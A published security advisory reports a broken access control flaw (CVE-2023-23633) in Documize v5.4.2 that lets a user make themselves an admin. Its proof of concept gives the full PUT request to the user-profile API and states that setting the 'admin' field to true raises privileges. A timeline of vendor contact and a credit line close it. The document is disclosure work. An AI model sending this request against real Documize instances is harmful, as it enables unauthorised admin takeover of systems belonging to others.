usd-2022-0065 | Documize v5.4.2 (221021105923) - Broken Access Control

Advisory ID: usd-2022-0065
Product: Documize
Affected Version: v5.4.2 (221021105923)
Vulnerability Type: Broken Access Control (CWE-284)
Security Risk: Critical
Vendor URL: https://www.documize.com
Vendor Status: Not fixed
CVE number: CVE-2023-23633

Description

A Broken Access Control was found in documize, which allows a user to set theirselves admin permissions.

Proof of Concept

The following request was done to update a users profile.

PUT /api/users/cee5ocin9t3sjau0153g HTTP/1.1
Host: localhost:5001
Content-Length: 698
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: json
authorization: ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.99 Safari/537.36
[...]{"firstname":"jane","lastname":"doe","email":"janedoe@example.com","initials":"JD","active":true,"editor":true,"admin":false,"viewUsers":true,"analytics":false,"global":false,"accounts":[{"id":"cee5ocin9t3sjau01540","created":"2022-12-15T19:53:22.974178Z","revised":"2022-12-15T19:59:07.184606Z","admin":false,"editor":true,"viewUsers":true,"analytics":false,"userId":"cee5ocin9t3sjau0153g","orgId":"cee5o0qn9t3sjau010c0","company":"Test","title":"Test","message":"Documize Community instance contains all our documentation","domain":"","active":true,"theme":""}],"groups":null,"lastVersion":"","theme":"","created":"2022-12-15T19:53:22.973889Z","revised":"2022-12-15T19:59:07.183878Z","locale":""}

Changing the keys admin to true results in higher privileges.

Fix

Do not allow users to edit any fields on their database entry.

References

Timeline

  • 2022-12-16: First contact request via mail
  • 2023-01-09: Second contact request via mail
  • 2023-01-16: Try to contact vendor again
  • 2023-02-02: Try to contact vendor again
  • 2023-12-22: Publish advisory

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.